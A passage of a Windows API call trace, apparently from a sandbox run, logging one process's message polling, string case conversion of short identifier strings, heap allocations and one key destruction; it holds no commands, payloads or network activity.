out: lpMsg=0x8bf160) returned 0 [0201.186] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0201.186] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0201.186] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0201.186] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0201.186] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0201.186] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0201.186] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.186] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0201.186] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0201.186] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0201.186] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0201.186] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0201.186] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.186] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.186] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.187] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.187] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.187] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.188] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.188] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.188] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0201.188] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0201.188] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0201.188] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0201.188] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0201.188] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0201.188] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0201.188] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0201.188] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0201.188] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0201.188] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.188] CryptDestroyKey (hKey=0xaa5960) returned 1 [0201.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0201.189] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0201.189] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0201.189] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0201.189] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0201.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0201.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0201.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0201.190] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0201.190] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0201.190] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0201.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0201.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0201.190] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0201.190] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0201.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0201.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0201.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0201.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0201.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0201.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.190] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0201.190] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0201.190] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0201.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0201.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0201.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0201.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0201.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0201.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.191] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0201.191] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0201.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0201.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0201.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0201.195] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0201.196] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0201.196] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0201.196] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0201.196] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0201.196] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0201.196] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0201.196] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0201.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0201.197] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0201.197] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0201.197] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0201.197] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0201.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0201.198] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0201.198] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.198] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0201.198] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0201.198] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0201.198] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0201.198] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.198] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0201.199] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.199] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0201.199] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0201.199] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0201.199] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0201.199] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0201.199] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0201.199] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0201.200] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0201.200] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0201.200] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0201.200] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0201.200] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0201.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0201.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0201.201] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0201.201] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0201.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0201.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0201.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0201.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0201.201] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0201.201] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0201.201] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0201.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0201.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0201.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0201.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0201.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0201.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0201.202] RtlAllocateHeap 